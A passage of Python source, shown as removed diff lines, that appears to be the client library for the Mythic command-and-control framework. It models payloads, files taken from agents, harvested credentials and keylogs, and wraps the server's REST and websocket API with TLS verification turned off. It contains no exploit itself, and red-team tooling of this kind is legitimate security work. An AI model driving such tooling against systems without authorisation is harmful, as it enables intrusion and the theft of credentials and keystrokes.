build_phase - self._build_message = build_message - self._id = id - if isinstance(commands, List) and len(commands) > 0: - if isinstance(commands[0], Command): - self._commands = commands - elif isinstance(commands[0], Dict): - self._commands = [Command(**x) for x in commands] - else: - self._commands = [Command(cmd=x) for x in commands] - else: - self._commands = None - if isinstance(c2_profiles, Dict): - self._c2_profiles = {} - for k, v in c2_profiles.items(): - key = ( - k["name"] - if isinstance(k, Dict) - else k.name - if isinstance(k, C2Profile) - else k - ) - self._c2_profiles[key] = [] - for i in v: - # now iterate over each list of parameters for the profile - if isinstance(i, C2ProfileParameters): - self._c2_profiles[key].append(i) - elif isinstance(i, Dict): - self._c2_profiles[key].append(C2ProfileParameters(**i)) - else: - self._c2_profiles = None - self._filename = filename - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Payload): - return self._uuid == other.uuid - return False - - @property - def uuid(self) -> str: - return self._uuid - - @uuid.setter - def uuid(self, uuid): - self._uuid = uuid - - @property - def tag(self) -> str: - return self._tag - - @tag.setter - def tag(self, tag): - self._tag = tag - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def payload_type(self) -> PayloadType: - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - if isinstance(payload_type, PayloadType) or payload_type is None: - self._payload_type = payload_type - else: - self._payload_type = PayloadType(ptype=payload_type) - - @property - def pcallback(self) -> "Callback": - return self._pcallback - - @pcallback.setter - def pcallback(self, pcallback): - if isinstance(pcallback, Callback) or pcallback is None: - self._pcallback = pcallback - else: - self._pcallback = Callback(id=pcallback) - - @property - def c2_profiles(self) -> Dict: - return self._c2_profiles - - @c2_profiles.setter - def c2_profiles(self, c2_profiles): - if isinstance(c2_profiles, Dict): - self._c2_profiles = {} - for k, v in c2_profiles.items(): - key = ( - k["name"] - if isinstance(k, Dict) - else k.name - if isinstance(k, C2Profile) - else k - ) - self._c2_profiles[key] = [] - for i in v: - # now iterate over each list of parameters for the profile - if isinstance(i, C2ProfileParameters): - self._c2_profiles[key].append(i) - elif isinstance(i, Dict): - self._c2_profiles[key].append(C2ProfileParameters(**i)) - else: - self._c2_profiles = None - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def wrapped_payload(self) -> "Payload": - return self._wrapped_payload - - @wrapped_payload.setter - def wrapped_payload(self, wrapped_payload): - if isinstance(wrapped_payload, Payload) or wrapped_payload is None: - self._wrapped_payload = wrapped_payload - else: - self._wrapped_payload = Payload(uuid=payload) - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def build_phase(self) -> str: - return self._build_phase - - @build_phase.setter - def build_phase(self, build_phase): - self._build_phase = build_phase - - @property - def build_message(self) -> str: - return self._build_message - - @build_message.setter - def build_message(self, build_message): - self._build_message = build_message - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def build_container(self) -> str: - return self._build_container - - @build_container.setter - def build_container(self, build_container): - self._build_container = build_container - - @property - def commands(self) -> List[Command]: - return self._commands - - @commands.setter - def commands(self, commands): - if isinstance(commands, List): - self._commands = [ - Command(**x) if isinstance(x, Dict) else x for x in commands - ] - else: - self._commands = None - - @property - def build_parameters(self) -> List[Dict]: - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - @property - def file_id(self) -> "FileMeta": - return self._file_id - - @file_id.setter - def file_id(self, file_id): - if isinstance(file_id, "FileMeta") or file_id is None: - self._file_id = file_id - else: - self._file_id = FileMeta(**file_id) - - @property - def filename(self) -> str: - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - -class FileMeta: - def __init__( - self, - agent_file_id: str = None, - total_chunks: int = None, - chunks_received: int = None, - chunk_size: int = None, - task: Union[Task, Dict] = None, - complete: bool = None, - path: str = None, - full_remote_path: str = None, - host: str = None, - is_payload: bool = None, - is_screenshot: bool = None, - is_download_from_agent: bool = None, - file_browser: Dict = None, - filename: str = None, - delete_after_fetch: bool = None, - operation: Union[Operation, str] = None, - timestamp: str = None, - deleted: bool = None, - operator: Union[Operator, str] = None, - md5: str = None, - sha1: str = None, - id: int = None, - cmd: str = None, - comment: str = None, - upload: dict = None, - params: dict = None, - ): - self._agent_file_id = agent_file_id - self._total_chunks = total_chunks - self._chunks_received = chunks_received - self._chunk_size = chunk_size - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - self._complete = complete - self._path = path - self._full_remote_path = full_remote_path - self._host = host - self._is_payload = is_payload - self._is_screenshot = is_screenshot - self._is_download_from_agent = is_download_from_agent - self._file_browser = file_browser - self._filename = filename - self._delete_after_fetch = delete_after_fetch - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - self._timestamp = timestamp - self._deleted = deleted - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - self._md5 = md5 - self._sha1 = sha1 - self._id = id - self._cmd = cmd - self._comment = comment - self._upload = upload - self._params = params - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, FileMeta): - return self._id == other.id - return False - - @property - def agent_file_id(self): - return self._agent_file_id - - @agent_file_id.setter - def total_chunks(self, agent_file_id): - self._agent_file_id = agent_file_id - - @property - def total_chunks(self): - return self._total_chunks - - @total_chunks.setter - def total_chunks(self, total_chunks): - self._total_chunks = total_chunks - - @property - def chunks_received(self): - return self._chunks_received - - @chunks_received.setter - def chunks_received(self, chunks_received): - self._chunks_received = chunks_received - - @property - def chunk_size(self): - return self._chunk_size - - @chunk_size.setter - def chunk_size(self, chunk_size): - self._chunk_size = chunk_size - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - - @property - def complete(self): - return self._complete - - @complete.setter - def complete(self, complete): - self._complete = complete - - @property - def path(self): - return self._path - - @path.setter - def path(self, path): - self._path = path - - @property - def full_remote_path(self): - return self._full_remote_path - - @full_remote_path.setter - def full_remote_path(self, full_remote_path): - self._full_remote_path = full_remote_path - - @property - def host(self): - return self._host - - @host.setter - def host(self, host): - self._host = host - - @property - def is_payload(self): - return self._is_payload - - @is_payload.setter - def is_payload(self, is_payload): - self._is_payload = is_payload - - @property - def is_screenshot(self): - return self._is_screenshot - - @is_screenshot.setter - def is_screenshot(self, is_screenshot): - self._is_screenshot = is_screenshot - - @property - def is_download_from_agent(self): - return self._is_download_from_agent - - @is_download_from_agent.setter - def is_download_from_agent(self, is_download_from_agent): - self._is_download_from_agent = is_download_from_agent - - @property - def file_browser(self): - return self._file_browser - - @file_browser.setter - def file_browser(self, file_browser): - self._file_browser = file_browser - - @property - def filename(self): - return self._filename - - @filename.setter - def filename(self, filename): - self._filename = filename - - @property - def delete_after_fetch(self): - return self._delete_after_fetch - - @delete_after_fetch.setter - def delete_after_fetch(self, delete_after_fetch): - self._delete_after_fetch = delete_after_fetch - - @property - def operation(self): - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def timestamp(self): - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def md5(self): - return self._md5 - - @md5.setter - def md5(self, md5): - self._md5 = md5 - - @property - def sha1(self): - return self._sha1 - - @sha1.setter - def sha1(self, sha1): - self._sha1 = sha1 - - @property - def id(self): - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def cmd(self): - return self._cmd - - @cmd.setter - def cmd(self, cmd): - self._cmd = cmd - - @property - def comment(self): - return self._comment - - @comment.setter - def comment(self, comment): - self._comment = comment - - @property - def upload(self): - return self._upload - - @upload.setter - def upload(self, upload): - self._upload = upload - - @property - def params(self): - return self._params - - @params.setter - def params(self, params): - self._params = params - - -class Response: - def __init__( - self, - response: str = None, - timestamp: str = None, - task: Union[Task, int, Dict] = None, # JSON string of the corresponding task - id: int = None, - ): - self._response = response - self._timestamp = timestamp - if isinstance(task, Task) or task is None: - self._task = task - elif isinstance(task, Dict): - self._task = Task(**task) - else: - self._task = Task(id=task) - self._id = id - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Response): - return self._id == other.id - return False - - @property - def response(self) -> str: - return self._response - - @response.setter - def response(self, response): - self._response = response - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def task(self) -> Task: - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - elif isinstance(task, Dict): - self._task = Task(**task) - else: - self._task = Task(id=task) - - @property - def id(self): - return self._id - - @id.setter - def id(self, id): - self._id = id - - -class Credential: - def __init__( - self, - type: str = None, - task: Union[Task, int] = None, - task_command: Union[Command, str] = None, - account: str = None, - realm: str = None, - id: int = None, - operator: Union[Operator, str] = None, - operation: Union[Operation, str] = None, - timestamp: str = None, - credential: bytes = None, - comment: str = None, - deleted: bool = None, - new: bool = None, - ): - self._type = type - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - if isinstance(task_command, Command) or task_command is None: - self._task_command = task_command - else: - self._task_command = Command(cmd=task_command) - self._account = account - self._realm = realm - self._id = id - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - self._timestamp = timestamp - self._credential = credential - self._comment = comment - self._deleted = deleted - self._new = new - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Credential): - return self._id == other.id - return False - - @property - def type(self) -> str: - return self._type - - @type.setter - def type(self, type): - self._type = type - - @property - def task(self) -> Task: - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=task) - - @property - def task_command(self) -> Command: - return self._task_command - - @task_command.setter - def task_command(self, task_command): - if isinstance(task_command, Command) or task_command is None: - self._task_command = task_command - else: - self._task_command = Command(cmd=task_command) - - @property - def account(self) -> str: - return self._account - - @account.setter - def account(self, account): - self._account = account - - @property - def realm(self) -> str: - return self._realm - - @realm.setter - def realm(self, realm): - self._realm = realm - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def credential(self) -> bytes: - return self._credential - - @credential.setter - def credential(self, credential): - self._credential = credential - - @property - def comment(self) -> str: - return self._comment - - @comment.setter - def comment(self, comment): - self._comment = comment - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def new(self) -> bool: - return self._new - - @new.setter - def new(self, new): - self._new = new - - -class Keylog: - def __init__( - self, - task: Union[Task, int] = None, - keystrokes: bytes = None, - window: str = None, - timestamp: str = None, - operation: Union[Operation, str] = None, - user: str = None, - host: str = None, - id: int = None, - callback: Union[Callback, Dict] = None, - ): - self._keystrokes = keystrokes - self._window = window - self._timestamp = timestamp - self._user = user - self._host = host - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=int) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(**callback) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Keylog): - return self._id == other.id - - @property - def keystrokes(self) -> bytes: - return self._keystrokes - - @keystrokes.setter - def keystrokes(self, keystrokes): - self._keystrokes = keystrokes - - @property - def window(self) -> str: - return self._window - - @window.setter - def window(self, window): - self._window = window - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def user(self) -> str: - return self._user - - @user.setter - def user(self, user): - self._user = user - - @property - def host(self) -> str: - return self._host - - @host.setter - def host(self, host): - self._host = host - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def task(self) -> Task: - return self._task - - @task.setter - def task(self, task): - if isinstance(task, Task) or task is None: - self._task = task - else: - self._task = Task(id=int) - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def callback(self) -> Callback: - return self._callback - - @callback.setter - def callback(self, callback): - if isinstance(callback, Callback) or callback is None: - self._callback = callback - else: - self._callback = Callback(**callback) - - -class DisabledCommandsProfile: - def __init__( - self, - payload_types: List[Union[PayloadType, str, Dict]] = None, - name: str = None, - ): - self._name = name - if isinstance(payload_types, List): - self._payload_types = [ - PayloadType(ptype=x) - if isinstance(x, str) - else PayloadType(**x) - if isinstance(x, Dict) - else x - for x in payload_types - ] - else: - self._payload_types = payload_types - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, DisabledCommandsProfile): - return self._name == other.name - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def payload_types(self) -> List[PayloadType]: - return self._payload_types - - @payload_types.setter - def payload_types(self, payload_types): - if isinstance(payload_types, List): - self._payload_types = [ - PayloadType(ptype=x) - if isinstance(x, str) - else PayloadType(**x) - if isinstance(x, Dict) - else x - for x in payload_types - ] - else: - self._payload_types = payload_types - - -class EventMessage: - def __init__( - self, - operator: Union[Operator, str] = None, - timestamp: str = None, - message: str = None, - operation: Union[Operation, str] = None, - level: str = None, - deleted: bool = None, - resolved: bool = None, - id: int = None, - channel: str = None, - alerts: List[Dict] = None, - ): - self._timestamp = timestamp - self._message = message - self._level = level - self._deleted = deleted - self._resolved = resolved - self._id = id - self._channel = channel - self._alerts = alerts - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, EventMessage): - return self._id == other.id - - @property - def operator(self) -> Operator: - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - @property - def timestamp(self) -> str: - return self._timestamp - - @timestamp.setter - def timestamp(self, timestamp): - self._timestamp = timestamp - - @property - def message(self) -> str: - return self._message - - @message.setter - def message(self, message): - self._message = message - - @property - def operation(self) -> Operation: - return self._operation - - @operation.setter - def operation(self, operation): - if isinstance(operation, Operation) or operation is None: - self._operation = operation - else: - self._operation = Operation(name=operation) - - @property - def level(self) -> str: - return self._level - - @level.setter - def level(self, level): - self._level = level - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def resolved(self) -> bool: - return self._resolved - - @resolved.setter - def resolved(self, resolved): - self._resolved = resolved - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def channel(self) -> str: - return self._channel - - @channel.setter - def channel(self, channel): - self._channel = channel - - @property - def alerts(self) -> List[Dict]: - return self._alerts - - @alerts.setter - def alerts(self, alerts): - self._alerts = alerts - - -class MythicResponse: - def __init__( - self, - response=None, - raw_response: Dict[str, str] = None, - response_code: int = None, - status: str = None, - ): - # set the response_code and raw_response automatically - self.response_code = response_code - self.raw_response = raw_response - # determine and set status if it's not explicitly specified - if status is None and "status" in raw_response: - self.status = raw_response["status"] - elif status is None and self.response_code != 200: - self.status = "error" - else: - self.status = status - # if the raw_response has a status indicator, remove it and set the response - # otherwise just set response to raw_response and process later - if "status" in raw_response and response is None: - del raw_response["status"] - self.response = raw_response - elif response is None: - self.response = raw_response - - def to_json(self): - r = {} - for k in vars(self): - try: - r[k] = getattr(self, k) - except: - r[k] = json.dumps(getattr(self, k)) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - @property - def response(self): - return self.__response - - @property - def status(self): - return self.__status - - @property - def response_code(self): - return self.__response_code - - @property - def raw_response(self): - return self.__raw_response - - @response.setter - def response(self, response): - self.__response = response - - @response_code.setter - def response_code(self, response_code): - self.__response_code = response_code - - @status.setter - def status(self, status): - self.__status = status - - @raw_response.setter - def raw_response(self, raw_response): - self.__raw_response = raw_response - - -class Mythic: - def __init__( - self, - username: str = None, - password: str = None, - apitoken: Union[APIToken, str] = None, - access_token: str = None, - refresh_token: str = None, - server_ip: str = None, - ssl: bool = False, - server_port: str = None, - server_api_version: int = 1.4, - operator: Operator = None, - global_timeout: int = None, - ): - self._username = username - self._password = password - if isinstance(apitoken, APIToken) or apitoken is None: - self._apitoken = apitoken - else: - self._apitoken = APIToken(token_value=apitoken) - self._access_token = access_token - self._refresh_token = refresh_token - self._server_ip = server_ip - self._server_port = server_port - self._server_api_version = server_api_version - self._operator = operator - self._ssl = ssl - self._http = "http://" if not ssl else "https://" - self._ws = "ws://" if not ssl else "wss://" - self._global_timeout = global_timeout if global_timeout is not None else -1 - - def to_json(self): - r = {} - for k in vars(self): - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps(getattr(self, k)) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - # ======== GETTING INTERNAL VALUES ================== - @property - def username(self): - return self._username - - @property - def password(self): - return self._password - - @property - def apitoken(self): - return self._apitoken - - @property - def access_token(self): - return self._access_token - - @property - def refresh_token(self): - return self._refresh_token - - @property - def server_ip(self): - return self._server_ip - - @property - def server_port(self): - return self._server_port - - @property - def operator(self): - return self._operator - - @property - def server_api_version(self): - return self._server_api_version - - @property - def ssl(self): - return self._ssl - - @property - def global_timeout(self): - return self._global_timeout - - # ========== SETTING INTERNAL VALUES =============== - @username.setter - def username(self, username=None): - self._username = username - - @password.setter - def password(self, password=None): - self._password = password - - @apitoken.setter - def apitoken(self, apitoken=None): - if isinstance(apitoken, APIToken) or apitoken is None: - self._apitoken = apitoken - else: - self._apitoken = APIToken(token_value=apitoken) - - @access_token.setter - def access_token(self, access_token=None): - self._access_token = access_token - - @refresh_token.setter - def refresh_token(self, refresh_token=None): - self._refresh_token = refresh_token - - @server_ip.setter - def server_ip(self, server_ip=None): - self._server_ip = server_ip - - @server_port.setter - def server_port(self, server_port=None): - self._server_port = server_port - - @operator.setter - def operator(self, operator=None): - self._operator = operator - - @server_api_version.setter - def server_api_version(self, server_api_version=None): - self._server_api_version = server_api_version - - @ssl.setter - def ssl(self, ssl=False): - self._ssl = ssl - self._http = "http://" if not ssl else "https://" - self._ws = "ws://" if not ssl else "wss://" - - # ======== BASIC GET/POST/PUT/DELETE JSON WEB REQUESTS ========= - - def get_headers(self) -> dict: - if self._apitoken is not None: - return {"apitoken": self._apitoken.token_value} - elif self._access_token is not None: - return {"Authorization": "Bearer {}".format(self._access_token)} - else: - return {} - - async def get_json(self, url) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - async with session.get(url, headers=headers, ssl=False) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - #print(o) - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - #print(e) - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - async def get_file(self, url) -> bytes: - headers = self.get_headers() - async with aiohttp.ClientSession() as session: - async with session.get(url, headers=headers, ssl=False) as resp: - data = await resp.read() - return data - - - async def put_json(self, url, data) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - async with session.put( - url, json=data, headers=headers, ssl=False - ) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - async def post_json(self, url, data) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - async with session.post( - url, json=data, headers=headers, ssl=False - ) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - async def delete_json(self, url) -> MythicResponse: - headers = self.get_headers() - try: - async with aiohttp.ClientSession() as session: - async with session.delete(url, headers=headers, ssl=False) as resp: - return MythicResponse( - response_code=resp.status, raw_response=await resp.json() - ) - except OSError as o: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(o)} - ) - except Exception as e: - return MythicResponse( - response_code=0, raw_response={"status": "error", "error": str(e)} - ) - - # ======== WEBSOCKET BASED HELPER ENDPOINTS ======================== - - async def print_websocket_output(self, mythic, data) -> None: - try: - await json_print(data) - except Exception as e: - raise Exception("Failed to decode json data: " + str(e)) - - async def cast_data(self, data): - try: - json_data = json.loads(data) - if "channel" in json_data: - if "callback" in json_data["channel"]: - del json_data["channel"] - return Callback(**json_data) - elif "task" in json_data["channel"]: - del json_data["channel"] - return Task(**json_data) - elif "response" in json_data["channel"]: - del json_data["channel"] - return Response(**json_data) - elif "historic" in json_data["channel"]: - return EventMessage(**json_data) - elif "event" in json_data["channel"]: - return EventMessage(**json_data) - elif "chunks_received" in json_data: - return FileMeta(**json_data) - elif "build_phase" in json_data: - return Payload(**json_data) - elif "agent_task_id" in json_data: - return Task(**json_data) - elif "response" in json_data: - return Response(**json_data) - elif "realm" in json_data: - return Credential(**json_data) - elif "level" in json_data: - return EventMessage(**json_data) - elif "agent_callback_id" in json_data: - return Callback(**json_data) - else: - raise Exception("Unknown Mythic Object: " + json.dumps(json_data, indent=2)) - except Exception as e: - raise Exception("Failed to decode json data: " + str(e)) - - async def thread_output_helper( - self, url, callback_function=None, timeout=None - ) -> None: - headers = self.get_headers() - if timeout is None: - timeout = self.global_timeout - try: - async with aiohttp.ClientSession() as session: - ws = await session.ws_connect(url, headers=headers, ssl=False) - start = time() - while True: - try: - if timeout > 0 and (time() - start >= timeout): - raise Exception( - "Timeout in listening on websocket endpoint: {}".format( - url - ) - ) - msg = await ws.receive() - if msg.data is None: - raise Exception( - "Got no data from websocket: {}".format(str(msg)) - ) - if msg.data != "": - task = asyncio.get_event_loop().create_task( - callback_function(self, await self.cast_data(msg.data)) - ) - asyncio.ensure_future(task) - except Exception as e: - raise Exception("Got exception reading from websocket, exiting websocket: " + str(e)) - except Exception as e: - raise Exception("Failed to get websocket connection: " + str(e)) - - async def stream_output(self, url, callback_function, timeout) -> asyncio.Task: - task = asyncio.get_event_loop().create_task( - self.thread_output_helper(url, callback_function, timeout) - ) - asyncio.ensure_future(task) - return task - - # ================== OPERATION ENDPOINTS ====================== - - async def get_current_operation_info(self) -> MythicResponse: - """ - Gets information about the current operation for the user - """ - if self.operator is None: - await self.get_self() - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - self.operator.current_operation.id, - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def get_all_operations(self) -> MythicResponse: - """ - Gets information about all operations your operator can see - """ - url = "{}{}:{}/api/v{}/operations".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - operations = [] - for o in resp.response["output"]: - operations.append(Operation(**o)) - resp.response = operations - return resp - - async def get_operation(self, operation: Operation) -> MythicResponse: - """ - Gets information about the current user - """ - if operation.id is None: - resp = await self.get_all_operations() - if resp.response_code == 200 and resp.status == "success": - for o in resp.response: - if o.name == operation.name: - resp.response = o - return resp - raise Exception("Failed to find operation: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - else: - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.get_json(url) - if resp.response_code == 200: - resp.response = Operation(**resp.response) - return resp - - async def add_or_update_operator_for_operation( - self, operation: Operation, operator: Operator - ) -> MythicResponse: - """ - Adds an operator to an operation or updates an operator's view/block lists in an operation - """ - resp = await self.get_operation(operation) - if resp.status == "success": - operation = resp.response - else: - raise Exception( - "failed to get operation in add_or_update_operator_for_operation" - ) - data = {"add_members": [await obj_to_json(operator)]} - if operator.base_disabled_commands is not None: - data["add_disabled_commands"] = [await obj_to_json(operator)] - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.put_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def remove_operator_from_operation( - self, operation: Operation, operator: Operator - ) -> MythicResponse: - """ - Removes an operator from an operation - """ - resp = await self.get_operation(operation) - if resp.status == "success": - operation = resp.response - else: - raise Exception("failed to get operation in remove_operator_for_operation") - data = {"remove_members": [operator.username]} - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.put_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def update_operation(self, operation: Operation) -> MythicResponse: - """ - Updates information about an operation such as webhook and completion status - """ - if operation.id is None: - resp = await self.get_operation(operation) - if resp.status == "error": - raise Exception("Failed to get_operation in update_operation") - operation.id = resp.response.id - url = "{}{}:{}/api/v{}/operations/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operation.id), - ) - resp = await self.put_json(url, data=await obj_to_json(operation)) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - async def create_operation(self, operation: Operation) -> MythicResponse: - """ - Creates a new operation and specifies the admin of the operation - """ - url = "{}{}:{}/api/v{}/operations/".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - ) - data = { - "name": operation.name, - "admin": operation.admin.username - } - resp = await self.post_json(url, data=data) - if resp.response_code == 200 and resp.status == "success": - resp.response = Operation(**resp.response) - return resp - - # ================== OPERATOR ENDPOINTS ====================== - - async def get_self(self) -> MythicResponse: - """ - Gets information about the current user - """ - url = "{}{}:{}/api/v{}/operators/me".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200 and resp.status == "success": - self.operator = Operator(**resp.response) - resp.response = Operator(**resp.response) - return resp - - async def get_operator(self, operator: Operator) -> MythicResponse: - """ - Gets information about the current user - """ - if operator.id is None: - # need to get the operator's ID first, which means we need to get all operators and match the username - url = "{}{}:{}/api/v{}/operators/".format( - self._http, self.server_ip, self._server_port, self._server_api_version - ) - resp = await self.get_json(url) - if resp.response_code == 200: - if resp.status is None: - resp.status = "success" - for o in resp.response: - if o["username"] == operator.username: - resp.response = Operator(**o) - return resp - raise Exception("Operator not found: " + json.dumps(resp, indent=2, default=lambda o: o.to_json())) - return resp - else: - url = "{}{}:{}/api/v{}/operators/{}".format( - self._http, - self.server_ip, - self._server_port, - self._server_api_version, - str(operator.id), - ) - resp = await 